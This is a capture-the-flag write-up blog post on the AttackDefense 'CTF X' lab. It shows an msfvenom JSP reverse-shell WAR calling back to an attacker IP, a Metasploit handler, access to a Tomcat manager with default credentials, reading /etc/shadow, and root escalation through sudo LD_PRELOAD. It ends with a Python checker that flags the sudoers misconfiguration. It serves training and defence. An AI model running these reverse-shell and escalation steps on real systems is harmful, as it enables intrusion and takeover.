AttackDefense - CTF X- Kali GUI Attacker

Summary

CTF X was one of the easy CTFs on AttackDefense.
The goal of this box is to get three flags. First we get a low-privilege shell as the tomcat user.
After getting the shell we enumerate and find the user's password inside an archive.
Privilege escalation to root was very simple: sudo preserves LD_PRELOAD through env_keep, so we can use that to get root.

Enumeration

Enumerating this box with nmap we see that only ports 22 and 80 are open.

As port 80 is open, let's run nikto against it and see if we find something.

We see that the Tomcat manager is accessible to us with default credentials.

Let's create a reverse shell payload with msfvenom:

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.77.154.2 LPORT=4444 -f war > shell.war

We also set up the handler for that in Metasploit:

msf>use exploit/multi/handler
msf>set payload java/jsp_shell_reverse_tcp
msf>set lhost 192.77.154.2
msf>set lport 4444
msf>exploit -j

Then we upload the WAR file to the web server through the Tomcat manager.

We execute it by opening /shell in the browser.

This gives us a reverse shell back on the handler.
Opening a shell on that session we can see FLAG1 and read it.

Privilege Escalation to User

Enumerating the box I saw that we can read the /etc/shadow file, and we find the user robert. But when I tried to crack that hash, I was unable to crack the password.

Then, looking around the Tomcat configuration folder, we find a .tar.gz file which seems to be a backup of those configurations. Extracting it we see a password for robert.

Using that with ssh we get a shell as robert, with which we can read FLAG2.

Privilege Escalation to Root

Let's enumerate the box for a path to root.

Running sudo -l we see that we are allowed to run the /bin/ls command as root, but the most interesting part here is the env_keep setting.
Looking at the man page of ld.so we find the description of LD_PRELOAD:

LD_PRELOAD
A list of additional, user-specified, ELF shared objects to be
loaded before all others. This feature can be used to selectively
override functions in other shared objects.

The items of the list can be separated by spaces or colons,
and there is no support for escaping either separator. The
objects are searched for using the rules given under DESCRIPTION.
Objects are searched for and added to the link map in
the left-to-right order specified in the list.

In secure-execution mode, preload pathnames containing slashes
are ignored. Furthermore, shared objects are preloaded only
from the standard search directories and only if they have
set-user-ID mode bit enabled (which is not typical).

Within the names specified in the LD_PRELOAD list, the dynamic
linker understands the tokens $ORIGIN, $LIB, and $PLATFORM (or
the versions using curly braces around the names) as described
above in Rpath token expansion. (See also the discussion of
quoting under the description of LD_LIBRARY_PATH.)

There are various methods of specifying libraries to be preloaded,
and these are handled in the following order:

(1) The LD_PRELOAD environment variable.

(2) The --preload command-line option when invoking the
dynamic linker directly.

(3) The /etc/ld.so.preload file (described below).

Googling for LD_PRELOAD exploitation we find an article which shows how to abuse it.
We follow its instructions.

We write and compile a shared library.

Let's execute ls with sudo, preloading that library:

sudo LD_PRELOAD=/tmp/shell.so /bin/ls

This gives us a shell as root, with which we can read FLAG3.

And with that we have pwned this box.
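As a defensive counterpart to the env_keep finding above, here is an added check (not from the original writeup or from sudo itself) that flags sudoers lines which keep dynamic-loader variables, with the weak configuration beside the corrected one. The sudoers snippets are constructed; the user and command mirror the writeup but are not the box's real file.

```python
"""Flag sudoers 'env_keep' entries that preserve dynamic-loader variables.

Added example for this writeup, not from the original page or from sudo.
The sudoers snippets below are constructed."""
from __future__ import annotations
import re

# Loader variables sudo removes by default; keeping any of them lets a user
# who may run one command as root load arbitrary code into that command.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

# Defaults[:@>!scope] env_keep (=|+=) "VAR VAR ..."  with optional # comment.
# 'env_keep -= ...' removes variables and is intentionally not matched.
ENV_KEEP_RE = re.compile(
    r'^\s*Defaults(?:[:@>!]\S+)?\s+env_keep\s*(\+?=)\s*"?([^"#]*?)"?\s*(?:#.*)?$'
)

def find_kept_loader_vars(sudoers_text: str) -> list[tuple[int, str]]:
    """Return (line_number, variable) for every loader variable kept by an
    env_keep line. Backslash line continuations are not modelled."""
    findings = []
    for lineno, line in enumerate(sudoers_text.splitlines(), start=1):
        m = ENV_KEEP_RE.match(line)
        if not m:
            continue
        for var in m.group(2).split():
            if var in LOADER_VARS:
                findings.append((lineno, var))
    return findings

# Weak: env_keep hands LD_PRELOAD through to the root-run /bin/ls.
WEAK_SUDOERS = """\
Defaults        env_reset
Defaults        env_keep += "LD_PRELOAD"
robert ALL=(root) /bin/ls
"""

# Corrected: the env_keep line is simply removed. With env_reset in effect
# sudo strips LD_* variables on its own, so no extra setting is needed.
FIXED_SUDOERS = """\
Defaults        env_reset
robert ALL=(root) /bin/ls
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_SUDOERS), ("fixed", FIXED_SUDOERS)):
        print(name, find_kept_loader_vars(text))
```

Run it against `visudo -c`-validated copies of /etc/sudoers and /etc/sudoers.d/* to catch this misconfiguration before an attacker does.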

💃
Author: Shubham Kumar
Link: https://f3v3r.in/ad/ctfx/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.